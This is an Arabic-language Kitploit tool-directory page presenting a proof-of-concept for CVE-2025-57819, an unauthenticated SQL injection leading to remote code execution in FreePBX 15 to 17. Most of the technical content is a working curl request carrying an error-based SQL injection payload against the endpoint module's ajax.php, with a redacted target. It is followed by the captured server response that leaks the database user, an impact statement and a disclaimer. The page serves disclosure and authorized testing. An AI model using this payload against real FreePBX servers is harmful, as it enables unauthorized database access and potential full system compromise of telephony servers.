Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SQL-Injection-and-RCE_CVE-2025-57819 — تحتوي إصدارات FreePBX 15 و16 و17 على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) ناتجة عن عدم كفاية تعقيم البيانات التي يقدمها المستخدم في نقاط النهاية. | Kitploit
أدوات/GitHubGitHub/muhammadwaseem29/sql-injection-and-rce_cve-2025-57819
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubmuhammadwaseem29/sql-injection-and-rce_cve-2025-57819

SQL-Injection-and-RCE_CVE-2025-57819

تحتوي إصدارات FreePBX 15 و16 و17 على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) ناتجة عن عدم كفاية تعقيم البيانات التي يقدمها المستخدم في نقاط النهاية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودعالموقع الإلكتروني
72منذ 11 أشهرلم تتم المراجعة بعد

FreePBX RCE PoC (بدون مصادقة)

الملخص

تحتوي إصدارات FreePBX 15 و16 و17 على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) ناتجة عن عدم كفاية تعقيم البيانات المقدمة من المستخدم في نقاط النهاية.
يمكن لمهاجم غير مصادق عليه التلاعب بقاعدة البيانات وتحقيق تنفيذ تعليمات برمجية عن بُعد. لا يتطلب الاستغلال أي مصادقة.

المرجع

  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h

إثبات المفهوم (PoC)

ملاحظة: تم حجب الهدف. استبدل [REDACTED_TARGET] بالمضيف الحقيقي عند إجراء اختبارات مصرح بها.

الطلب

root@kitploit:~
curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"

الاستجابة (مثال تم التقاطه أثناء الاختبار)

root@kitploit:~
HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json

{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}

لماذا يثبت هذا الأمر: تحتوي الاستجابة على ~USER:freepbxuser@localhost~ — مما يؤكد حقن SQL / الكشف عن البيانات من طلب غير مصادق عليه.

carbon (1)

التأثير

التلاعب عن بُعد بقاعدة البيانات بدون مصادقة مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية على الخادم — مع إمكانية اختراق النظام بالكامل.


إخلاء المسؤولية

تم توفير هذا المستودع وإثبات المفهوم (PoC) لأغراض تعليمية وبحوث أمنية مصرح بها فقط. لا تختبر أو تستغل الأنظمة دون إذن صريح. المؤلف غير مسؤول عن سوء الاستخدام أو الأضرار الناتجة عن إثبات المفهوم هذا.

root@kitploit:~
تنزيل الأداة